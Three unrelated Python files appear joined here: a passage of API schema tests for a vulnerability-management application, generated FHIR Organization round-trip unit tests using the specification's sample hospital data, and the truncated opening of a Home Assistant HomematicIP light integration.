            schema = endpoints['get']['responses']['200']['schema']
            for id in ids:
                print('id:', id)
                response = self.client.get(format_url(f"/{self.viewname}/{id}/"), extra_args)
                print('response type:', type(response))
                print('response data:', response.data)
                check_response_valid(status.HTTP_200_OK, response)
                obj = response.data
                self.check_schema(schema, obj)

        @skipIfNotSubclass(UpdateModelMixin)
        def test_patch_endpoint(self, extra_args=None):
            operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]["patch"]
            id = self.get_valid_object_id()
            if id is None:
                self.skipTest("No data exists to test endpoint")
            data = self.construct_response_data(id)
            schema = operation['responses']['200']['schema']
            response = self.client.patch(format_url(f"/{self.viewname}/{id}/"), data, format='json')
            check_response_valid(status.HTTP_200_OK, response)
            obj = response.data
            self.check_schema(schema, obj)

        @skipIfNotSubclass(UpdateModelMixin)
        def test_put_endpoint(self, extra_data=None, extra_args=None):
            operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]['put']
            id = self.get_valid_object_id()
            if id is None:
                self.skipTest("No data exists to test endpoint")
            data = self.construct_response_data(id)
            data.update(extra_data or {})
            schema = operation['responses']['200']['schema']
            response = self.client.put(format_url(f"/{self.viewname}/{id}/"), data, format='json')
            check_response_valid(status.HTTP_200_OK, response)
            obj = response.data
            self.check_schema(schema, obj)

        @skipIfNotSubclass(CreateModelMixin)
        def test_post_endpoint(self, extra_data=None, extra_args=None):
            operation = self.schema["paths"][f"/{self.viewname}/"]["post"]
            id = self.get_valid_object_id()
            if id is None:
                self.skipTest("No data exists to test endpoint")
            data = self.construct_response_data(id)
            data.update(extra_data or {})
            print('data:', data)
            schema = operation['responses']['201']['schema']
            response = self.client.post(format_url(f"/{self.viewname}/"), data, format='json')
            check_response_valid(status.HTTP_201_CREATED, response)
            print('response.data:', response.data)
            obj = response.data
            self.check_schema(schema, obj)
class DevelopmentEnvironmentTest(BaseClass.SchemaTest):
    """Schema checks for /development_environments/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Development_Environment
        self.serializer = DevelopmentEnvironmentSerializer
        self.viewname = "development_environments"
        self.viewset = DevelopmentEnvironmentViewSet
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class DojoGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "group"
# self.viewset = DojoGroupViewSet
# self.model = Dojo_Group
# self.serializer = DojoGroupSerializer
class EndpointStatusTest(BaseClass.SchemaTest):
    """Schema checks for /endpoint_status/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Endpoint_Status
        self.serializer = EndpointStatusSerializer
        self.viewname = "endpoint_status"
        self.viewset = EndpointStatusViewSet
class EndpointTest(BaseClass.SchemaTest):
    """Schema checks for /endpoints/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Endpoint
        self.serializer = EndpointSerializer
        self.viewname = "endpoints"
        self.viewset = EndPointViewSet
        # Mutate the path so re-submitted data differs from the original
        # (presumably to avoid uniqueness clashes — TODO confirm).
        self.field_transformers = {"path": lambda v: (v if v else '') + "transformed/"}
class EngagementTest(BaseClass.SchemaTest):
    """Schema checks for /engagements/ and its accept_risks/notes sub-routes."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Engagement
        self.serializer = EngagementSerializer
        self.viewname = "engagements"
        self.viewset = EngagementViewSet

    def test_accept_risks(self):
        # POST /engagements/{id}/accept_risks/ and validate the 201 body.
        op = self.get_endpoint_schema("/engagements/{id}/accept_risks/", "post")
        response_schema = op['responses']['201']['schema']
        print(response_schema)
        obj_id = self.get_valid_object_id()
        if obj_id is None:
            self.skipTest("No data exists to test endpoint")
        payload = [{"cve": 1, "justification": "test", "accepted_by": "2"}]
        response = self.client.post(
            format_url(f"/engagements/{obj_id}/accept_risks/"), payload, format='json')
        check_response_valid(201, response)
        print('response.data')
        print(response.content)
        self.check_schema(response_schema, response.data)

    def test_notes_read(self):
        # GET /engagements/{id}/notes/ and validate the 200 body.
        op = self.get_endpoint_schema("/engagements/{id}/notes/", "get")
        response_schema = op['responses']['200']['schema']
        obj_id = self.get_valid_object_id()
        if obj_id is None:
            self.skipTest("No data exists to test endpoint")
        response = self.client.get(format_url(f"/engagements/{obj_id}/notes/"))
        check_response_valid(200, response)
        self.check_schema(response_schema, response.data)

    def test_notes_create(self):
        # POST /engagements/{id}/notes/ and validate the 201 body.
        op = self.get_endpoint_schema("/engagements/{id}/notes/", "post")
        response_schema = op['responses']['201']['schema']
        obj_id = self.get_valid_object_id()
        if obj_id is None:
            self.skipTest("No data exists to test endpoint")
        payload = {"entry": "test", "author": 2}
        response = self.client.post(
            format_url(f"/engagements/{obj_id}/notes/"), payload, format='json')
        check_response_valid(201, response)
        self.check_schema(response_schema, response.data)
class FindingTemplateTest(BaseClass.SchemaTest):
    """Schema checks for /finding_templates/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Finding_Template
        self.serializer = FindingTemplateSerializer
        self.viewname = "finding_templates"
        self.viewset = FindingTemplatesViewSet

    # Previously broken, now fixed — pinned here without extra arguments.
    def test_post_endpoint(self):
        super().test_post_endpoint()

    def test_patch_endpoint(self):
        super().test_patch_endpoint()

    def test_put_endpoint(self):
        super().test_put_endpoint()
class FindingTest(BaseClass.SchemaTest):
    """Schema checks for /findings/, including the related_fields expansion."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Finding
        self.serializer = FindingSerializer
        self.viewname = "findings"
        self.viewset = FindingViewSet

    def test_list_endpoint(self):
        super().test_list_endpoint({"related_fields": True})

    def test_patch_endpoint(self):
        super().test_patch_endpoint()

    def test_put_endpoint(self):
        super().test_put_endpoint()

    def test_retrieve_endpoint(self):
        super().test_retrieve_endpoint({"related_fields": True})
class JiraInstanceTest(BaseClass.SchemaTest):
    """Schema checks for /jira_instances/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = JIRA_Instance
        self.serializer = JIRAInstanceSerializer
        self.viewname = "jira_instances"
        self.viewset = JiraInstanceViewSet

    def test_list_endpoint(self):
        super().test_list_endpoint()

    def test_patch_endpoint(self):
        super().test_patch_endpoint()

    def test_put_endpoint(self):
        # password is write-only and never serialized back, so supply one.
        super().test_put_endpoint(extra_data={"password": "12345"})

    def test_retrieve_endpoint(self):
        super().test_retrieve_endpoint()

    def test_post_endpoint(self):
        super().test_post_endpoint(extra_data={"password": "12345"})
class JiraFindingMappingsTest(BaseClass.SchemaTest):
    """Schema checks for /jira_finding_mappings/."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = JIRA_Issue
        self.serializer = JIRAIssueSerializer
        self.viewname = "jira_finding_mappings"
        self.viewset = JiraIssuesViewSet
        # Point re-submitted mappings at fixed objects (ids match the test
        # fixture — presumably; TODO confirm).
        self.field_transformers = {
            "finding": lambda v: 2,
            "engagement": lambda v: 2,
        }
class JiraProjectTest(BaseClass.SchemaTest):
    """Schema checks for the jira_projects endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "jira_projects"
        self.serializer = JIRAProjectSerializer
        self.viewset = JiraProjectViewSet
        self.model = JIRA_Project
class MetadataTest(BaseClass.SchemaTest):
    """Schema checks for the metadata endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "metadata"
        self.serializer = MetaSerializer
        self.viewset = DojoMetaViewSet
        self.model = DojoMeta
class NoteTypeTest(BaseClass.SchemaTest):
    """Schema checks for the note_type endpoint.

    The name transformer keeps updated payloads unique.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "note_type"
        self.serializer = NoteTypeSerializer
        self.viewset = NoteTypeViewSet
        self.model = Note_Type
        self.field_transformers = {"name": lambda v: v + "_new"}
class NoteTest(BaseClass.SchemaTest):
    """Schema checks for the notes endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "notes"
        self.serializer = NoteSerializer
        self.viewset = NotesViewSet
        self.model = Notes
class ProductTypeTest(BaseClass.SchemaTest):
    """Schema checks for the product_types endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "product_types"
        self.serializer = ProductTypeSerializer
        self.viewset = ProductTypeViewSet
        self.model = Product_Type
        self.field_transformers = {"name": lambda v: v + "_new"}
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductTypeMemberTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_type_members"
# self.viewset = ProductTypeMemberViewSet
# self.model = Product_Type_Member
# self.serializer = ProductTypeMemberSerializer
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductTypeGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_type_groups"
# self.viewset = ProductTypeGroupViewSet
# self.model = Product_Type_Group
# self.serializer = ProductTypeGroupSerializer
class ProductTest(BaseClass.SchemaTest):
    """Schema checks for the products endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "products"
        self.serializer = ProductSerializer
        self.viewset = ProductViewSet
        self.model = Product
        self.field_transformers = {"name": lambda v: v + "_new"}
    # fixed
    def test_list_endpoint(self):
        super().test_list_endpoint()
    # fixed
    def test_patch_endpoint(self):
        super().test_patch_endpoint()
    # fixed
    def test_put_endpoint(self):
        super().test_put_endpoint()
    # fixed
    def test_retrieve_endpoint(self):
        super().test_retrieve_endpoint()
    # fixed
    def test_post_endpoint(self):
        super().test_post_endpoint()
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductMemberTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_members"
# self.viewset = ProductMemberViewSet
# self.model = Product_Member
# self.serializer = ProductMemberSerializer
# @testIsBroken
# def test_post_endpoint(self):
# super().test_post_endpoint()
# @testIsBroken
# def test_patch_endpoint(self):
#         super().test_patch_endpoint()
# Test will only work when FEATURE_AUTHENTICATION_V2 is the default
# class ProductGroupTest(BaseClass.SchemaTest):
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.viewname = "product_groups"
# self.viewset = ProductGroupViewSet
# self.model = Product_Group
# self.serializer = ProductGroupSerializer
class RegulationTest(BaseClass.SchemaTest):
    """Schema checks for the regulations endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "regulations"
        self.serializer = RegulationSerializer
        self.viewset = RegulationsViewSet
        self.model = Regulation
class SonarqubeIssuesTest(BaseClass.SchemaTest):
    """Schema checks for the sonarqube_issues endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "sonarqube_issues"
        self.serializer = SonarqubeIssueSerializer
        self.viewset = SonarqubeIssueViewSet
        self.model = Sonarqube_Issue
        self.field_transformers = {"key": lambda v: v + "_new"}
class SonarqubeProductConfTest(BaseClass.SchemaTest):
    """Schema checks for the sonarqube_product_configurations endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "sonarqube_product_configurations"
        self.serializer = SonarqubeProductSerializer
        self.viewset = SonarqubeProductViewSet
        self.model = Sonarqube_Product
class SonarqubeTransitionTest(BaseClass.SchemaTest):
    """Schema checks for the sonarqube_transitions endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "sonarqube_transitions"
        self.serializer = SonarqubeIssueTransitionSerializer
        self.viewset = SonarqubeIssueTransitionViewSet
        self.model = Sonarqube_Issue_Transition
class StubFindingTest(BaseClass.SchemaTest):
    """Schema checks for the stub_findings endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "stub_findings"
        self.serializer = StubFindingSerializer
        self.viewset = StubFindingsViewSet
        self.model = Stub_Finding
class SystemSettingTest(BaseClass.SchemaTest):
    """Schema checks for the system_settings endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "system_settings"
        self.serializer = SystemSettingsSerializer
        self.viewset = SystemSettingsViewSet
        self.model = System_Settings
class AppAnalysisTest(BaseClass.SchemaTest):
    """Schema checks for the technologies (app analysis) endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "technologies"
        self.serializer = AppAnalysisSerializer
        self.viewset = AppAnalysisViewSet
        self.model = App_Analysis
    # fixed
    def test_patch_endpoint(self):
        super().test_patch_endpoint()
    # fixed
    def test_put_endpoint(self):
        super().test_put_endpoint()
    # fixed
    def test_post_endpoint(self):
        super().test_post_endpoint()
class TestTypeTest(BaseClass.SchemaTest):
    """Schema checks for the test_types endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "test_types"
        self.serializer = TestTypeSerializer
        self.viewset = TestTypesViewSet
        self.model = Test_Type
        self.field_transformers = {"name": lambda v: v + "_new"}
class TestsTest(BaseClass.SchemaTest):
    """Schema checks for the tests endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "tests"
        self.serializer = TestSerializer
        self.viewset = TestsViewSet
        self.model = Test
class ToolConfigurationTest(BaseClass.SchemaTest):
    """Schema checks for the tool_configurations endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "tool_configurations"
        self.serializer = ToolConfigurationSerializer
        self.viewset = ToolConfigurationsViewSet
        self.model = Tool_Configuration
class ToolProductSettingTest(BaseClass.SchemaTest):
    """Schema checks for the tool_product_settings endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "tool_product_settings"
        self.serializer = ToolProductSettingsSerializer
        self.viewset = ToolProductSettingsViewSet
        self.model = Tool_Product_Settings
class ToolTypeTest(BaseClass.SchemaTest):
    """Schema checks for the tool_types endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "tool_types"
        self.serializer = ToolTypeSerializer
        self.viewset = ToolTypesViewSet
        self.model = Tool_Type
class UserTest(BaseClass.SchemaTest):
    """Schema checks for the users endpoint.

    Usernames are transformed on update to avoid uniqueness clashes.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "users"
        self.serializer = UserSerializer
        self.viewset = UsersViewSet
        self.model = Dojo_User
        self.field_transformers = {"username": lambda v: v + "_transformed"}
class LanguageTypeTest(BaseClass.SchemaTest):
    """Schema checks for the language_types endpoint."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "language_types"
        self.serializer = LanguageTypeSerializer
        self.viewset = LanguageTypeViewSet
        self.model = Language_Type
class LanguageTest(BaseClass.SchemaTest):
    """Schema checks for the languages endpoint.

    POST needs an explicit language id to satisfy the unique constraint.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.viewname = "languages"
        self.serializer = LanguageSerializer
        self.viewset = LanguageViewSet
        self.model = Languages
    def test_post_endpoint(self):
        super().test_post_endpoint(extra_data={"language": 2})
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2016-06-23.
# 2016, SMART Health IT.
import io
import json
import os
import unittest
from . import organization
class OrganizationTests(unittest.TestCase):
    """Round-trip tests for FHIR DSTU2 Organization example resources.

    Each test parses one example JSON file into an Organization, checks its
    fields (implOrganizationN), serializes it back to JSON, re-parses the
    result, and checks the copy again. The repeated parse/verify/serialize/
    re-verify boilerplate is factored into _roundtrip.
    """
    def instantiate_from(self, filename):
        """Load *filename* from FHIR_UNITTEST_DATADIR and return an Organization."""
        datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
        with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
            js = json.load(handle)
            self.assertEqual("Organization", js["resourceType"])
        return organization.Organization(js)

    def _roundtrip(self, filename, impl):
        """Instantiate from *filename*, verify with *impl*, then serialize,
        re-parse and verify the copy as well."""
        inst = self.instantiate_from(filename)
        self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
        impl(inst)
        js = inst.as_json()
        self.assertEqual("Organization", js["resourceType"])
        impl(organization.Organization(js))

    def testOrganization1(self):
        self._roundtrip("organization-example-f001-burgers.json",
                        self.implOrganization1)

    def implOrganization1(self, inst):
        self.assertEqual(inst.address[0].city, "Den Burg")
        self.assertEqual(inst.address[0].country, "NLD")
        self.assertEqual(inst.address[0].line[0], "Galapagosweg 91")
        self.assertEqual(inst.address[0].postalCode, "9105 PZ")
        self.assertEqual(inst.address[0].use, "work")
        self.assertEqual(inst.address[1].city, "Den Burg")
        self.assertEqual(inst.address[1].country, "NLD")
        self.assertEqual(inst.address[1].line[0], "PO Box 2311")
        self.assertEqual(inst.address[1].postalCode, "9100 AA")
        self.assertEqual(inst.address[1].use, "work")
        self.assertEqual(inst.contact[0].purpose.coding[0].code, "PRESS")
        self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
        self.assertEqual(inst.contact[0].telecom[0].system, "phone")
        self.assertEqual(inst.contact[0].telecom[0].value, "022-655 2334")
        self.assertEqual(inst.contact[1].purpose.coding[0].code, "PATINF")
        self.assertEqual(inst.contact[1].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
        self.assertEqual(inst.contact[1].telecom[0].system, "phone")
        self.assertEqual(inst.contact[1].telecom[0].value, "022-655 2335")
        self.assertEqual(inst.id, "f001")
        self.assertEqual(inst.identifier[0].system, "urn:oid:2.16.528.1")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "91654")
        self.assertEqual(inst.identifier[1].system, "urn:oid:2.16.840.1.113883.2.4.6.1")
        self.assertEqual(inst.identifier[1].use, "usual")
        self.assertEqual(inst.identifier[1].value, "17-0112278")
        self.assertEqual(inst.name, "Burgers University Medical Center")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].use, "work")
        self.assertEqual(inst.telecom[0].value, "022-655 2300")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "V6")
        self.assertEqual(inst.type.coding[0].display, "University Medical Hospital")
        self.assertEqual(inst.type.coding[0].system, "urn:oid:2.16.840.1.113883.2.4.15.1060")
        self.assertEqual(inst.type.coding[1].code, "prov")
        self.assertEqual(inst.type.coding[1].display, "Healthcare Provider")
        self.assertEqual(inst.type.coding[1].system, "http://hl7.org/fhir/organization-type")

    def testOrganization2(self):
        self._roundtrip("organization-example-f002-burgers-card.json",
                        self.implOrganization2)

    def implOrganization2(self, inst):
        self.assertTrue(inst.active)
        self.assertEqual(inst.address[0].line[0], "South Wing, floor 2")
        self.assertEqual(inst.contact[0].address.line[0], "South Wing, floor 2")
        self.assertEqual(inst.contact[0].name.text, "mevr. D. de Haan")
        self.assertEqual(inst.contact[0].purpose.coding[0].code, "ADMIN")
        self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
        self.assertEqual(inst.contact[0].telecom[0].system, "phone")
        self.assertEqual(inst.contact[0].telecom[0].value, "022-655 2321")
        self.assertEqual(inst.contact[0].telecom[1].system, "email")
        self.assertEqual(inst.contact[0].telecom[1].value, "cardio@burgersumc.nl")
        self.assertEqual(inst.contact[0].telecom[2].system, "fax")
        self.assertEqual(inst.contact[0].telecom[2].value, "022-655 2322")
        self.assertEqual(inst.id, "f002")
        self.assertEqual(inst.name, "Burgers UMC Cardiology unit")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].value, "022-655 2320")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "dept")
        self.assertEqual(inst.type.coding[0].display, "Hospital Department")
        self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/organization-type")

    def testOrganization3(self):
        self._roundtrip("organization-example-f003-burgers-ENT.json",
                        self.implOrganization3)

    def implOrganization3(self, inst):
        self.assertTrue(inst.active)
        self.assertEqual(inst.address[0].line[0], "West Wing, floor 5")
        self.assertEqual(inst.contact[0].address.line[0], "West Wing, floor 5")
        self.assertEqual(inst.contact[0].name.text, "mr. F. de Hond")
        self.assertEqual(inst.contact[0].purpose.coding[0].code, "ADMIN")
        self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
        self.assertEqual(inst.contact[0].telecom[0].system, "phone")
        self.assertEqual(inst.contact[0].telecom[0].value, "022-655 7654")
        self.assertEqual(inst.contact[0].telecom[1].system, "email")
        self.assertEqual(inst.contact[0].telecom[1].value, "KNO@burgersumc.nl")
        self.assertEqual(inst.contact[0].telecom[2].system, "fax")
        self.assertEqual(inst.contact[0].telecom[2].value, "022-655 0998")
        self.assertEqual(inst.id, "f003")
        self.assertEqual(inst.name, "Burgers UMC Ear,Nose,Throat unit")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].value, "022-655 6780")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "dept")
        self.assertEqual(inst.type.coding[0].display, "Hospital Department")
        self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/organization-type")

    def testOrganization4(self):
        self._roundtrip("organization-example-f201-aumc.json",
                        self.implOrganization4)

    def implOrganization4(self, inst):
        self.assertTrue(inst.active)
        self.assertEqual(inst.address[0].city, "Den Helder")
        self.assertEqual(inst.address[0].country, "NLD")
        self.assertEqual(inst.address[0].line[0], "Walvisbaai 3")
        self.assertEqual(inst.address[0].postalCode, "2333ZA")
        self.assertEqual(inst.address[0].use, "work")
        self.assertEqual(inst.contact[0].address.city, "Den helder")
        self.assertEqual(inst.contact[0].address.country, "NLD")
        self.assertEqual(inst.contact[0].address.line[0], "Walvisbaai 3")
        self.assertEqual(inst.contact[0].address.line[1], "Gebouw 2")
        self.assertEqual(inst.contact[0].address.postalCode, "2333ZA")
        self.assertEqual(inst.contact[0].name.family[0], "Brand")
        self.assertEqual(inst.contact[0].name.given[0], "Ronald")
        self.assertEqual(inst.contact[0].name.prefix[0], "Prof.Dr.")
        self.assertEqual(inst.contact[0].name.text, "Professor Brand")
        self.assertEqual(inst.contact[0].name.use, "official")
        self.assertEqual(inst.contact[0].telecom[0].system, "phone")
        self.assertEqual(inst.contact[0].telecom[0].use, "work")
        self.assertEqual(inst.contact[0].telecom[0].value, "+31715269702")
        self.assertEqual(inst.id, "f201")
        self.assertEqual(inst.identifier[0].system, "http://www.zorgkaartnederland.nl/")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "Artis University Medical Center")
        self.assertEqual(inst.name, "Artis University Medical Center (AUMC)")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].use, "work")
        self.assertEqual(inst.telecom[0].value, "+31715269111")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "405608006")
        self.assertEqual(inst.type.coding[0].display, "Academic Medical Center")
        self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.type.coding[1].code, "V6")
        self.assertEqual(inst.type.coding[1].display, "University Medical Hospital")
        self.assertEqual(inst.type.coding[1].system, "urn:oid:2.16.840.1.113883.2.4.15.1060")
        self.assertEqual(inst.type.coding[2].code, "prov")
        self.assertEqual(inst.type.coding[2].display, "Healthcare Provider")
        self.assertEqual(inst.type.coding[2].system, "http://hl7.org/fhir/organization-type")

    def testOrganization5(self):
        self._roundtrip("organization-example-f203-bumc.json",
                        self.implOrganization5)

    def implOrganization5(self, inst):
        self.assertTrue(inst.active)
        self.assertEqual(inst.address[0].city, "Blijdorp")
        self.assertEqual(inst.address[0].country, "NLD")
        self.assertEqual(inst.address[0].line[0], "apenrots 230")
        self.assertEqual(inst.address[0].postalCode, "3056BE")
        self.assertEqual(inst.address[0].use, "work")
        self.assertEqual(inst.id, "f203")
        self.assertEqual(inst.identifier[0].system, "http://www.zorgkaartnederland.nl/")
        self.assertEqual(inst.identifier[0].type.text, "Zorginstelling naam")
        self.assertEqual(inst.identifier[0].use, "official")
        self.assertEqual(inst.identifier[0].value, "Blijdorp MC")
        self.assertEqual(inst.name, "Blijdorp Medisch Centrum (BUMC)")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].use, "work")
        self.assertEqual(inst.telecom[0].value, "+31107040704")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "405608006")
        self.assertEqual(inst.type.coding[0].display, "Academic Medical Center")
        self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
        self.assertEqual(inst.type.coding[1].code, "prov")
        self.assertEqual(inst.type.coding[1].system, "http://hl7.org/fhir/organization-type")

    def testOrganization6(self):
        self._roundtrip("organization-example-gastro.json",
                        self.implOrganization6)

    def implOrganization6(self, inst):
        self.assertEqual(inst.id, "1")
        self.assertEqual(inst.identifier[0].system, "http://www.acme.org.au/units")
        self.assertEqual(inst.identifier[0].value, "Gastro")
        self.assertEqual(inst.name, "Gastroenterology")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].use, "mobile")
        self.assertEqual(inst.telecom[0].value, "+1 555 234 3523")
        self.assertEqual(inst.telecom[1].system, "email")
        self.assertEqual(inst.telecom[1].use, "work")
        self.assertEqual(inst.telecom[1].value, "gastro@acme.org")
        self.assertEqual(inst.text.status, "generated")

    def testOrganization7(self):
        self._roundtrip("organization-example-good-health-care.json",
                        self.implOrganization7)

    def implOrganization7(self, inst):
        self.assertEqual(inst.id, "2.16.840.1.113883.19.5")
        self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
        self.assertEqual(inst.identifier[0].value, "2.16.840.1.113883.19.5")
        self.assertEqual(inst.name, "Good Health Clinic")
        self.assertEqual(inst.text.status, "generated")

    def testOrganization8(self):
        self._roundtrip("organization-example-insurer.json",
                        self.implOrganization8)

    def implOrganization8(self, inst):
        self.assertEqual(inst.id, "2")
        self.assertEqual(inst.identifier[0].system, "urn:oid:2.16.840.1.113883.3.19.2.3")
        self.assertEqual(inst.identifier[0].value, "666666")
        self.assertEqual(inst.name, "XYZ Insurance")
        self.assertEqual(inst.text.status, "generated")

    def testOrganization9(self):
        self._roundtrip("organization-example-lab.json",
                        self.implOrganization9)

    def implOrganization9(self, inst):
        self.assertEqual(inst.id, "1832473e-2fe0-452d-abe9-3cdb9879522f")
        self.assertEqual(inst.identifier[0].system, "http://www.acme.org.au/units")
        self.assertEqual(inst.identifier[0].value, "ClinLab")
        self.assertEqual(inst.name, "Clinical Lab")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].use, "work")
        self.assertEqual(inst.telecom[0].value, "+1 555 234 1234")
        self.assertEqual(inst.telecom[1].system, "email")
        self.assertEqual(inst.telecom[1].use, "work")
        self.assertEqual(inst.telecom[1].value, "contact@labs.acme.org")
        self.assertEqual(inst.text.status, "generated")

    def testOrganization10(self):
        self._roundtrip("organization-example.json",
                        self.implOrganization10)

    def implOrganization10(self, inst):
        self.assertEqual(inst.address[0].city, "Ann Arbor")
        self.assertEqual(inst.address[0].country, "USA")
        self.assertEqual(inst.address[0].line[0], "3300 Washtenaw Avenue, Suite 227")
        self.assertEqual(inst.address[0].postalCode, "48104")
        self.assertEqual(inst.address[0].state, "MI")
        self.assertEqual(inst.extension[0].url, "http://hl7.org/fhir/StructureDefinition/organization-alias")
        self.assertEqual(inst.extension[0].valueString, "HL7 International")
        self.assertEqual(inst.id, "hl7")
        self.assertEqual(inst.name, "Health Level Seven International")
        self.assertEqual(inst.telecom[0].system, "phone")
        self.assertEqual(inst.telecom[0].value, "(+1) 734-677-7777")
        self.assertEqual(inst.telecom[1].system, "fax")
        self.assertEqual(inst.telecom[1].value, "(+1) 734-677-6622")
        self.assertEqual(inst.telecom[2].system, "email")
        self.assertEqual(inst.telecom[2].value, "hq@HL7.org")
        self.assertEqual(inst.text.status, "generated")
| |
"""Support for HomematicIP Cloud lights."""
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_NAME, ATTR_HS_COLOR, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR, Light)
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
_LOGGER = logging.getLogger(__name__)
ATTR_ENERGY_COUNTER = 'energy_counter_kwh'
ATTR_POWER_CONSUMPTION = 'power_consumption'
async def async_setup_platform(
        hass, config, async_add_entities, discovery_info=None):
    """Old way of setting up HomematicIP Cloud lights.

    Setup happens via config entries, so this legacy hook is a no-op.
    """
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up the HomematicIP Cloud lights from a config entry."""
    from homematicip.aio.device import (
        AsyncBrandDimmer, AsyncBrandSwitchMeasuring,
        AsyncBrandSwitchNotificationLight, AsyncDimmer,
        AsyncFullFlushDimmer, AsyncPluggableDimmer)

    home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
    dimmer_types = (AsyncDimmer, AsyncPluggableDimmer,
                    AsyncBrandDimmer, AsyncFullFlushDimmer)
    entities = []
    for device in home.devices:
        if isinstance(device, AsyncBrandSwitchMeasuring):
            entities.append(HomematicipLightMeasuring(home, device))
        elif isinstance(device, AsyncBrandSwitchNotificationLight):
